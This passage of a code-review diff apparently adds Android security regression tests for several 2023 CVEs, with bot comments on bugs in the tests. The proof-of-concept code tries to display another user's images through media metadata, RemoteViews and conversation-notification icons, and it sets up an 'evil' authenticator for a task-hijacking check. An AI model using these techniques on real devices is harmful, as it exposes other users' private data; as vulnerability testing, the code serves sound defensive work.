+ } catch (IOException e) {
+ Log.i("CVE-2023-21285", "Got an exception: " + e);
+ }
+ return false;
+ }));
+
+ // Create a MediaSession
+ MediaSession session = new MediaSession(context, "cve_2023_21285_session");
+
+ // Create a separate handler thread
+ final HandlerThread handlerThread = new HandlerThread("cve_2023_21285_handlerThread");
+ handlerThread.start();
+
+ // Fetch uri from onMetadataChanged()
+ CompletableFuture<Boolean> uriReceived = new CompletableFuture<Boolean>();
+ session.getController()
+ .registerCallback(
+ new MediaController.Callback() {
+ @Override
+ public void onMetadataChanged(MediaMetadata metadata) {
+ uriReceived.complete(
+ metadata.getString(MediaMetadata.METADATA_KEY_ART_URI)
+ == null);
+ }
+ },
+ new Handler(handlerThread.getLooper()));
+
+ // Create MediaMetadata with 'uri' of cve_2023_21285_user and set metadata for 'session'
+ session.setMetadata(
+ new MediaMetadata.Builder()
+ .putString(
+ MediaMetadata.METADATA_KEY_ART_URI,
+ ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, testUserId)
+ .toString())
+ .build());
+
+ // Fail the test if uri stored in 'METADATA_KEY_ART_URI' in mediaMetadata is not null
+ assertTrue(
+ "Device is vulnerable to b/271851153, hence images"
+ + " belonging to another user on the same device"
+ + " can be displayed in MediaStyle notifications",
+ uriReceived.get(5_000L /* timeout */, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
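Review bot: The `MediaSession` and the `HandlerThread` created in `testPocCVE_2023_21285` are never torn down, so an active session and a looper thread outlive the test on every path, including the assumption failures. Declaring both before the `try` and adding null-checked `session.release();` and `handlerThread.quitSafely();` calls to a `finally` block fixes that. Separately, `onMetadataChanged` dereferences `metadata` without a null check. The callback parameter may be null, and an exception there is thrown on the handler thread rather than inside the test's `catch`.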
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp
new file mode 100644
index 0000000..c0e20ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21286",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml
new file mode 100644
index 0000000..ad513e9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21286">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21286" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml
new file mode 100644
index 0000000..abb85d3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21286_img"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml
new file mode 100644
index 0000000..e3588ce
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21286_outer"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java
new file mode 100644
index 0000000..55c75be
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java
@@ -0,0 +1,145 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21286;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ UiAutomation uiAutomation, String permission) {
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testPocCVE_2023_21286() {
+ UiDevice uiDevice = null;
+ try {
+ final String cveId = "cve_2023_21286_";
+ final String title = cveId + "title";
+
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ int userId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+ for (UserInfo info : list) {
+ if (info.name.contains(cveId)) {
+ userId = info.id;
+ break;
+ }
+ }
+ }
+ assumeTrue(userId != -1);
+
+ // Post a notification with a content view containing image from other user
+ RemoteViews rvPortrait =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21286_layout);
+ rvPortrait.setImageViewUri(
+ R.id.cve_2023_21286_img,
+ Uri.parse("content://" + userId + "@media/external/images/media/"));
+ NotificationChannel notificationChannel =
+ new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+ RemoteViews rvOuter =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21286_layout_outer);
+ rvOuter.addView(R.id.cve_2023_21286_outer, rvPortrait);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification =
+ new Notification.Builder(context, cveId)
+ .setContentTitle(title)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .setCustomContentView(rvOuter)
+ .setCustomBigContentView(rvOuter)
+ .build();
+ try {
+ notificationManager.notify(0 /* id */, notification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Open notification shade
+ assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+ // Wait for notification to appear and detect if the remote view is present
+ uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+ UiObject2 exposedImg =
+ uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+ assertNull(
+ "Device is vulnerable to b/277740082, Other user's images can be exposed in"
+ + " notifications using remote views",
+ exposedImg);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
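Review bot: The result of `uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */)` is discarded in `testPocCVE_2023_21286`, so a notification that has not rendered in the shade when `findObject` runs looks the same as a device that withheld the other user's image, and `assertNull` passes either way. The patched path appears to exit earlier through the `SecurityException` branch, so reaching this point with no visible notification more likely means a slow or failed UI step than a fixed device. If the title is expected to be shown next to the custom content view, gate the assertion on it with `assumeTrue("Notification did not appear", uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */));`. Otherwise, add a comment saying the title wait is only a best-effort delay. Notification id 0 is also never cancelled, and the `finally` block only presses Home.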
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp
new file mode 100644
index 0000000..5b4d51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21291",
+ defaults: ["cts_support_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml
new file mode 100644
index 0000000..b5bd618
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21291">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21291" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java
new file mode 100644
index 0000000..ee75317
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21291;
+
+import static android.Manifest.permission.CREATE_USERS;
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Person;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.service.notification.StatusBarNotification;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21291() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ final UserManager userManager = context.getSystemService(UserManager.class);
+
+ // Check if the device supports multiple users or not
+ assumeTrue(
+ "This device does not support multiple users",
+ userManager.supportsMultipleUsers());
+
+ // Get the user id of "cve_2023_21291_user"
+ int testUserId =
+ SystemUtil.runWithShellPermissionIdentity(
+ () -> {
+ List<UserInfo> list = userManager.getUsers();
+ for (UserInfo info : list) {
+ if (info.toString().contains("cve_2023_21291_user")) {
+ return info.getUserHandle().getIdentifier();
+ }
+ }
+ return -1;
+ },
+ CREATE_USERS);
+ assumeTrue("Unable to find the user cve_2023_21291_user", testUserId != -1);
+
+ // Insert a placeholder content in the new user and query it to see if it has been
+ // inserted successfully
+ final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+ assumeTrue(
+ "Failed to insert a placeholder content in the test user",
+ poll(
+ () -> {
+ try {
+ SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content insert --user %d --uri %s --bind "
+ + "_display_name:s:cve_2023_21291.jpg",
+ testUserId, imagesContentUri));
+ return SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content query " + "--user %d --uri %s",
+ testUserId, imagesContentUri))
+ .contains("Row");
+ } catch (Exception e) {
+ Log.i("CVE-2023-21291", "Got an exception: " + e);
+ }
+ return false;
+ }));
+
+ // Create notificationManager
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+
+ // Create notificationChannel
+ String channelId = "cve_2023_21291_channel_id";
+ notificationManager.createNotificationChannel(
+ new NotificationChannel(
+ channelId,
+ "cve_2023_21291_channel_name" /* notification channel name */,
+ NotificationManager.IMPORTANCE_DEFAULT));
+
+ // Post the Notification and check if any security exception is caught
+ try {
+ notificationManager.notify(
+ 0 /* notification id */,
+ new Notification.Builder(context)
+ .setChannelId(channelId)
+ .setStyle(
+ new Notification.MessagingStyle(
+ new Person.Builder()
+ .setName("cve_2023_21291_person")
+ .build())
+ .setShortcutIcon(
+ Icon.createWithContentUri(
+ ContentProvider.maybeAddUserId(
+ EXTERNAL_CONTENT_URI,
+ testUserId))))
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */,
+ 0 /* offset */,
+ 0 /* length */))
+ .build());
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Check if notification gets posted or not, fail the test if notification gets posted
+ assertFalse(
+ "Device is vulnerable to b/277593270 hence images belonging to another user on"
+ + " the same device can be displayed in conversation notifications",
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ notificationManager.getActiveNotifications();
+ for (StatusBarNotification notification : activeNotifications) {
+ if (notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
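Review bot: In the `catch (SecurityException securityException)` block, `getLocalizedMessage()` may return null and `toLowerCase()` uses the device's default locale. An exception without a message would therefore surface as a NullPointerException through the outer `catch (Exception e)` / `assumeNoException(e)`, hiding the original SecurityException in the skip reason. A null-safe, locale-independent form is `String msg = securityException.getMessage();` followed by `if (msg != null && msg.toLowerCase(Locale.ROOT).contains(EXTERNAL_CONTENT_URI.toString())) { return; }`, which needs `import java.util.Locale;` and reuses the static import the file already has. The same check appears in the CVE-2023-21286 `DeviceTest.java` in this change. A short comment stating which message text the fix is expected to produce would make the substring match easier to maintain.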
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp
new file mode 100644
index 0000000..ccb0a70
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-35669-target",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "target-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "target-app/AndroidManifest.xml",
+}
+
+android_test_helper_app {
+ name: "CVE-2023-35669-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "compatibility-device-util-axt",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ resource_dirs: [
+ "res",
+ "test-app/res",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml
new file mode 100644
index 0000000..1dd7032
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml
@@ -0,0 +1,40 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="accountName">TestAccount</string>
+ <string name="accountType">testevilaccount</string>
+ <string name="actionTarget">actionTarget</string>
+ <string name="activityTarget">android.security.cts.CVE_2023_35669_target.TargetActivity</string>
+ <string name="app_name">CVE_2023_35669</string>
+ <string name="bcastActionTarget">CVE_2023_35669_TargetActivity</string>
+ <string name="fieldName">mNonLocalizedLabel</string>
+ <string name="isVulnerable">isVulnerable</string>
+ <string name="launchTaskId">android.activity.launchTaskId</string>
+ <string name="msgFailure">Device is vulnerable to b/265798288 !!</string>
+ <string name="noExceptionMsg">no exception</string>
+ <string name="objectNotFound">%1$s account not found</string>
+ <string name="password">password</string>
+ <string name="pkgTarget">android.security.cts.CVE_2023_35669_target</string>
+ <string name="pocActivityStatus">status</string>
+ <string name="pocCrashedMsg">PocActivity crashed with exception: %s</string>
+ <string name="pocFailedMsg">pocActivity failed</string>
+ <string name="removeAccount">REMOVE ACCOUNT</string>
+ <string name="spannableString">A</string>
+ <string name="targetFailMsg">TargetActivity did not launch successfully</string>
+ <string name="taskId">taskId</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml
new file mode 100644
index 0000000..8188feb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_35669_target">
+
+ <application>
+ <activity
+ android:name=".TargetActivity"
+ android:exported="true" />
+ </application>
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java
new file mode 100644
index 0000000..d8c3536
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_target;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class TargetActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.actionTarget), true)
+ .putExtra(getString(R.string.taskId), getTaskId()));
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..ea24191
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml
@@ -0,0 +1,41 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_35669_test">
+
+ <application>
+ <activity android:name=".HijackActivity" />
+
+ <service
+ android:name=".PocAuthService"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+
+ <activity android:name=".PocActivity" />
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_35669_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml
new file mode 100644
index 0000000..a4906cb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="testevilaccount"
+ android:label="@string/app_name"/>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java
new file mode 100644
index 0000000..026aa57
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+
+import static org.junit.Assert.assertFalse;
